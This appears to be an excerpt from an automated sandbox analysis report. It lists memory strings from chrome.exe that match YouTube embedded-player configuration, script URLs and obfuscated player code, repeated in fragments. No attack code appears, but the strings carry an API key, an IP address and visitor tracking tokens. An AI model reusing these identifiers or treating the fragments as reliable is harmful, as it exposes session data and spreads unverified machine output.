Source: chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323618407.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: ]Uchrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jschrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jsurrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}=(G=+(I=T%16+1,r()|0)*I-I*l- -5880*l+Z[w+11&7]*T*I- -3960*T*l+w+60*l*l+2*T*T*I-120*T*T*l,void 0),Z)[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ]Uhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393454896.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: access-control-allow-origin:https://www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2393573617.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352259272.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}AYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/e
Source: chrome.exe, 00000000.00000003.2393454896.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embe